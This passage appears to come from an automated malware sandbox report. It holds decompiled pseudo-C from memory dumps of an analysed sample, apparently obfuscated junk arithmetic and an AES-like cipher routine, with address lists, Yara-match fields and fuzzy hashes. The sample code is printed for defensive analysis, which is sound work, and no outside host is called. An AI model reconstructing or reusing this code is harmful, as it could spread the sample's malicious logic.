																							__edi = __edi ^  *0x110c4629;
																							asm("sbb ecx, [0x6e0b148b]");
																							__edi = __edi & 0x85346939;
																							_push(0x19e7a3a3);
																							__ebx =  *0x4d850760 * 0x1254 -  *0xb1220f81;
																							__esi = __esi &  *0xd10c8fed;
																							__bl = 0x14;
																							__ecx = 0x2371d7aa;
																							_push( *0x5a3016bc);
																							 *0xa94247f3 =  *0xa94247f3 &  *0xe5f92a6a * 0x000030b3;
																							__edi = 0x2371d7a9;
																							 *0xafda63a0 =  *0xafda63a0 << 0xe3;
																							__ch = 0x0000008a &  *0x9066e6e6;
																							asm("scasd");
																							__esp =  *0x7b1d9217 +  *0xd500860f;
																							__edx = 0xffffffff9b779450;
																							__al =  *0x77e0ee0a ^  *0x899399b1;
																							__esi = __esi & 0x79bffa13;
																							__edi = __edi & 0x8316763d;
																							__ebx =  *0x4d850760 * 0x1254 -  *0xb1220f81 + 1;
																							asm("ror dword [0x417c44be], 0x8b");
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L1:
				_t52 = _t52 - 0x3c;
				 *0xb05f328 =  *0xb05f328 << 0x70;
				_t48 = _t48 | 0x669ab5f1;
				_t51 = _t51 -  *0xcae98fd5;
				asm("rol dword [0xda01d43f], 0xd");
				goto L1;
			}








                                                        0x0041db3a
                                                        0x0041db4e
                                                        0x0041db55
                                                        0x0041db71
                                                        0x0041db72
                                                        0x0041db78
                                                        0x0041db82
                                                        0x0041db89
                                                        0x0041db8f
                                                        0x0041db95
                                                        0x0041db9b
                                                        0x0041db9c
                                                        0x0041dba2
                                                        0x0041dba9
                                                        0x0041dbb5
                                                        0x0041dbb8
                                                        0x0041dbb9
                                                        0x0041dbcc
                                                        0x0041dbd2
                                                        0x0041dbd3
                                                        0x0041dbd4
                                                        0x0041dbdb
                                                        0x0041dbe1
                                                        0x0041dbe7
                                                        0x0041dbf3
                                                        0x0041dc03
                                                        0x0041dc0a
                                                        0x0041dc10
                                                        0x0041dc17
                                                        0x0041dc1d
                                                        0x0041dc23
                                                        0x0041dc29
                                                        0x0041dc2f
                                                        0x0041dc3b
                                                        0x0041dc41
                                                        0x0041dc47
                                                        0x0041dc4d
                                                        0x0041dc53
                                                        0x0041dc54
                                                        0x0041dc5a
                                                        0x0041dc67
                                                        0x0041dc6e
                                                        0x0041dc6e
                                                        0x0041dc6e
                                                        0x0041dc7a
                                                        0x0041dc81
                                                        0x0041dc82
                                                        0x0041dc88
                                                        0x0041dc8e
                                                        0x0041dc95
                                                        0x0041dc96
                                                        0x0041dc9c
                                                        0x0041dca2
                                                        0x0041dca9
                                                        0x0041dcaf
                                                        0x0041dcb6
                                                        0x0041dcbc
                                                        0x0041dcc2
                                                        0x0041dcc8
                                                        0x0041dccd
                                                        0x0041dcd0
                                                        0x0041dcd7
                                                        0x0041dcdd
                                                        0x0041dce3
                                                        0x0041dce4
                                                        0x0041dce4
                                                        0x0041dce4
                                                        0x0041dcea
                                                        0x0041dcf6
                                                        0x0041dcfc
                                                        0x0041dd02
                                                        0x0041dd08
                                                        0x0041dd0e
                                                        0x0041dd15
                                                        0x0041dd1b
                                                        0x0041dd1d
                                                        0x0041dd23
                                                        0x0041dd2a
                                                        0x0041dd2f
                                                        0x0041dd36
                                                        0x0041dd3c
                                                        0x0041dd42
                                                        0x0041dd48
                                                        0x0041dd4f
                                                        0x0041dd54
                                                        0x0041dd5a
                                                        0x0041dd64
                                                        0x0041dd6a
                                                        0x0041dd70
                                                        0x0041dd75
                                                        0x0041dd7b
                                                        0x0041dd87
                                                        0x0041dd88
                                                        0x0041dd8e
                                                        0x0041dd95
                                                        0x0041dd9a
                                                        0x0041dda0
                                                        0x0041dda1
                                                        0x0041dda7
                                                        0x0041ddad
                                                        0x0041ddb3
                                                        0x0041ddb5
                                                        0x0041ddb6
                                                        0x0041ddbc
                                                        0x0041ddc2
                                                        0x0041ddc3
                                                        0x0041ddc9
                                                        0x0041ddcf
                                                        0x0041ddd0
                                                        0x0041ddd8
                                                        0x0041dddf
                                                        0x0041dde6
                                                        0x0041dde7
                                                        0x0041dded
                                                        0x0041ddf0
                                                        0x0041ddf6
                                                        0x0041ddfc
                                                        0x0041de03
                                                        0x0041de09
                                                        0x0041de0e
                                                        0x0041de14
                                                        0x0041de1a
                                                        0x0041de21
                                                        0x0041de22
                                                        0x0041de28
                                                        0x0041de2e
                                                        0x0041de34
                                                        0x0041de3a
                                                        0x0041de40
                                                        0x0041de49
                                                        0x0041de4f
                                                        0x0041de56
                                                        0x0041de5c
                                                        0x0041de62
                                                        0x0041de68
                                                        0x0041de6e
                                                        0x0041de78
                                                        0x0041de7a
                                                        0x0041de8a
                                                        0x0041de8d
                                                        0x0041de93
                                                        0x0041de9a
                                                        0x0041dea0
                                                        0x0041dea6
                                                        0x0041deac
                                                        0x0041deb8
                                                        0x0041debe
                                                        0x0041dec4
                                                        0x0041decb
                                                        0x0041ded1
                                                        0x0041ded7
                                                        0x0041dedd
                                                        0x0041dee3
                                                        0x0041dee9
                                                        0x0041def0
                                                        0x0041def6
                                                        0x0041defc
                                                        0x0041df02
                                                        0x0041df0b
                                                        0x0041df0c
                                                        0x0041df12
                                                        0x0041df13
                                                        0x0041df19
                                                        0x0041df25
                                                        0x0041df2b
                                                        0x0041df2c
                                                        0x0041df33
                                                        0x0041df39
                                                        0x0041df3f
                                                        0x0041df40
                                                        0x0041df46
                                                        0x0041df50
                                                        0x0041df50
                                                        0x0041df50
                                                        0x0041df56
                                                        0x0041df57
                                                        0x0041df5c
                                                        0x0041df62
                                                        0x0041df68
                                                        0x0041df75
                                                        0x0041df7c
                                                        0x0041df82
                                                        0x0041df84
                                                        0x0041df8a
                                                        0x0041df90
                                                        0x0041df97
                                                        0x0041df9e
                                                        0x0041dfaa
                                                        0x0041dfab
                                                        0x0041dfb2
                                                        0x0041dfbf
                                                        0x0041dfc0
                                                        0x0041dfc7
                                                        0x0041dfd3
                                                        0x0041dfdf
                                                        0x0041dfe5
                                                        0x0041dfe5
                                                        0x0041dfe5
                                                        0x0041dfeb
                                                        0x0041dff1
                                                        0x0041dff7
                                                        0x0041dffd
                                                        0x0041e003
                                                        0x0041e009
                                                        0x0041e00f
                                                        0x0041e021
                                                        0x0041e027
                                                        0x0041e029
                                                        0x0041e02a
                                                        0x0041e031
                                                        0x0041e038
                                                        0x0041e03e
                                                        0x0041e044
                                                        0x0041e049
                                                        0x0041e055
                                                        0x0041e05b
                                                        0x0041e061
                                                        0x0041e068
                                                        0x0041e06e
                                                        0x0041e074
                                                        0x0041e080
                                                        0x0041e086
                                                        0x0041e08c
                                                        0x0041e092
                                                        0x0041e09e
                                                        0x0041e0a1
                                                        0x0041e0a8
                                                        0x0041e0ae
                                                        0x0041e0b3
                                                        0x0041e0b9
                                                        0x0041e0bf
                                                        0x0041e0c0
                                                        0x0041e0c6
                                                        0x0041e0c7
                                                        0x0041e0cd
                                                        0x0041e0d3
                                                        0x0041e0da
                                                        0x0041e0e0
                                                        0x0041e0e1
                                                        0x0041e0e7
                                                        0x0041e0ee
                                                        0x0041e0ef
                                                        0x0041e0fb
                                                        0x0041e101
                                                        0x0041e10d
                                                        0x0041e10d
                                                        0x0041e10d
                                                        0x0041e113
                                                        0x0041e113
                                                        0x0041e113
                                                        0x0041e119
                                                        0x0041e125
                                                        0x0041e12b
                                                        0x0041e131
                                                        0x0041e137
                                                        0x0041e137
                                                        0x0041e13d
                                                        0x0041e142
                                                        0x0041e148
                                                        0x0041e155
                                                        0x0041e15b
                                                        0x0041e15c
                                                        0x0041e168
                                                        0x0041e16e
                                                        0x0041e174
                                                        0x0041e17b
                                                        0x0041e181
                                                        0x0041e186
                                                        0x0041e18d
                                                        0x0041e193
                                                        0x0041e199
                                                        0x0041e19f
                                                        0x0041e1a5
                                                        0x0041e1ab
                                                        0x0041e1b1
                                                        0x0041e1b7
                                                        0x0041e1b9
                                                        0x0041e1ba
                                                        0x0041e1c1
                                                        0x0041e1c7
                                                        0x0041e1cc
                                                        0x0041e1d3
                                                        0x0041e1e0
                                                        0x0041e1e6
                                                        0x0041e1ec
                                                        0x0041e1f3
                                                        0x0041e1f9
                                                        0x0041e1fa
                                                        0x0041e200
                                                        0x0041e201
                                                        0x0041e207
                                                        0x0041e207
                                                        0x0041e207
                                                        0x0041e20d
                                                        0x0041e214
                                                        0x0041e215
                                                        0x0041e21f
                                                        0x0041e227
                                                        0x0041e235
                                                        0x0041e23a
                                                        0x0041e240
                                                        0x0041e245
                                                        0x0041e24c
                                                        0x0041e256
                                                        0x0041e25c
                                                        0x0041e262
                                                        0x0041e269
                                                        0x0041e269
                                                        0x0041e269
                                                        0x0041e26f
                                                        0x0041e275
                                                        0x0041e27b
                                                        0x0041e281
                                                        0x0041e286
                                                        0x0041e28c
                                                        0x0041e292
                                                        0x0041e294
                                                        0x0041e29b
                                                        0x0041e2a1
                                                        0x0041e2a8
                                                        0x0041e2af
                                                        0x0041e2b6
                                                        0x0041e2bc
                                                        0x0041e2bd
                                                        0x0041e2c3
                                                        0x0041e2c9
                                                        0x0041e2d5
                                                        0x0041e2db
                                                        0x0041e2e1
                                                        0x0041e2e2
                                                        0x0041e2e2
                                                        0x0041e1c1
                                                        0x0041e125
                                                        0x0041e101
                                                        0x0041e0a8
                                                        0x0041e086
                                                        0x0041e068
                                                        0x0041e03e
                                                        0x0041e009
                                                        0x0041dfc7
                                                        0x0041df40
                                                        0x0041df13
                                                        0x0041debe
                                                        0x0041de68
                                                        0x0041de56
                                                        0x0041dda7
                                                        0x0041dd54
                                                        0x0041dc82
                                                        0x0041dc3b
                                                        0x0041d5a6
                                                        0x0041d5ac
                                                        0x0041d5b9
                                                        0x0041d5c0
                                                        0x0041d5c5
                                                        0x0041d5d1
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: mg98
                                                        • API String ID: 0-2199263299
                                                        • Opcode ID: 6d954f35d0d324459baac13d570150beda56d28667a150ebecd2492e2b1a5518
                                                        • Instruction ID: 1a6027264feb0a224148f04c2d95060ac072e89897748af391c65c7b3ac92a18
                                                        • Opcode Fuzzy Hash: 6d954f35d0d324459baac13d570150beda56d28667a150ebecd2492e2b1a5518
                                                        • Instruction Fuzzy Hash: 881299B3809791CFE711DF38D98AB413FB1F396324B08424EC8A197592D73825A6DF89
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B7DF7C, Relevance: 1.6, Strings: 1, Instructions: 372COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: c624ca358866dfc8cdd850b06327819dfaafa3dc827846df238a24fdcffba0d2
                                                        • Instruction ID: 19a2b4fbc5b94c48415de0d0b74fcd624b955bc2c6fe5187c2c9bcd9ab41a5ba
                                                        • Opcode Fuzzy Hash: c624ca358866dfc8cdd850b06327819dfaafa3dc827846df238a24fdcffba0d2
                                                        • Instruction Fuzzy Hash: 4DD14531D0421ADBDF28CF99C586ABEBBF1FF09304F6480EAD43AA6651D7709A41DB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B857C3, Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 6ff89ffd02ed3fa40b3e4c85325d106985f30b795af7060e5ca379a6d83ed0dc
                                                        • Instruction ID: 319b8dbbc3600b03ad7ac5d581d075bea6618a3777e1a5e65fd8f3efd6d088c7
                                                        • Opcode Fuzzy Hash: 6ff89ffd02ed3fa40b3e4c85325d106985f30b795af7060e5ca379a6d83ed0dc
                                                        • Instruction Fuzzy Hash: 38A1C271A146497ADF29EEA0CC81BFE36E5EF49300F0400EAF946DA1E1CA758D94DB21
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B60F3F, Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
                                                        • Instruction ID: 3019bf139f3a331da8b7861d5f321214583b01b44ad9c2d424a1a38e3cafaddb
                                                        • Opcode Fuzzy Hash: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
                                                        • Instruction Fuzzy Hash: BE81ED33E141149BDF28CE6DC890A7D77E1EB96320F1582ADD936AB2C6D770AD41CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B9A634, Relevance: .8, Instructions: 785COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 79c842ff115746f421f27fa1ff69aa9dfa9a290199830f0e4c8d710c8fdb2e1b
                                                        • Instruction ID: 4f36f6ace43fa0190173f0af2aec162b2c924a9bd83f6463cb64ebd147523379
                                                        • Opcode Fuzzy Hash: 79c842ff115746f421f27fa1ff69aa9dfa9a290199830f0e4c8d710c8fdb2e1b
                                                        • Instruction Fuzzy Hash: 65629072804A4AEFCF15CF48D5D14AEFBB2FA55304B59C2A8C89A27614D331BA54CBD2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B96540, Relevance: .7, Instructions: 652COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
                                                        • Instruction ID: 8105c557ab85b7292f4c61937c43d24a40909692a6b6dd5c4a593eb44872254c
                                                        • Opcode Fuzzy Hash: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
                                                        • Instruction Fuzzy Hash: 6C128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00BFCBA4, Relevance: .5, Instructions: 529COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a6d6ffe223e9015b44a93af88b1fc73398fb0eaeb0012e561437e6c9f6b0c3db
                                                        • Instruction ID: f7d0f01dfd0485d4f3db1378cc40fd95ac657655eeeabfd2fbc925eade051d75
                                                        • Opcode Fuzzy Hash: a6d6ffe223e9015b44a93af88b1fc73398fb0eaeb0012e561437e6c9f6b0c3db
                                                        • Instruction Fuzzy Hash: 3F226971D0021CCFDB24CF98C984AEDBBF1FF09314F1581AAE949AB291D375A989CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B52305, Relevance: .5, Instructions: 528COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c8112632399dcca40e4c8963fe43f78b76ace8ee353c95f649946a5a95257a97
                                                        • Instruction ID: 3dd0cb2d584ac58e8e5de6db9bdc0d753e1f4f7cdcd845d89af71fd52ada3449
                                                        • Opcode Fuzzy Hash: c8112632399dcca40e4c8963fe43f78b76ace8ee353c95f649946a5a95257a97
                                                        • Instruction Fuzzy Hash: 8E028033D5A7B74B8B754EB944E072A7AE09E0269231F47E9DDC03F286C116DD0E96E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00BDDBDA, Relevance: .5, Instructions: 504COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 561cad2a5e8b30414fa65e3cb88d36de2e60594a1e312079c5dcf43ae4a29a94
                                                        • Instruction ID: 74bb6d467a1a8d8ba746a3fc00b7425d2c27e42b4cda6e1e78afd0e40692b54a
                                                        • Opcode Fuzzy Hash: 561cad2a5e8b30414fa65e3cb88d36de2e60594a1e312079c5dcf43ae4a29a94
                                                        • Instruction Fuzzy Hash: 391298702146519ADB28DF29C494776F7E1EF05300F1888EBE8E68F796E334E855DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B7286D, Relevance: .5, Instructions: 460COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7a0b1ebce3bee567b6734cb99d1a51d83780df2a9106d9ef7672b7d39d00f278
                                                        • Instruction ID: d6ca6452a16f1a67bf381d213ad90eb805be5a4f733106559102b4982ac80379
                                                        • Opcode Fuzzy Hash: 7a0b1ebce3bee567b6734cb99d1a51d83780df2a9106d9ef7672b7d39d00f278
                                                        • Instruction Fuzzy Hash: 1D028F7090013A9ACF349F54C8887B9B7F1FF18701F5481EAE959A72A1E7348ED1DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402FB0, Relevance: .4, Instructions: 435COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 27%
                                                        			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t411;
				signed int _t428;
				signed int _t457;
				signed int _t477;
				signed int _t559;
				signed int _t602;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t457 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t457;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t428 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t457 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t602 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t457 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t457 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t477 = (_a4 >> 1) - 1;
				_a4 = _t477;
				if(_t477 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t602 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t602 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t602 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t559 =  *(__eax + 4 + (_t602 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t428 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t559 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
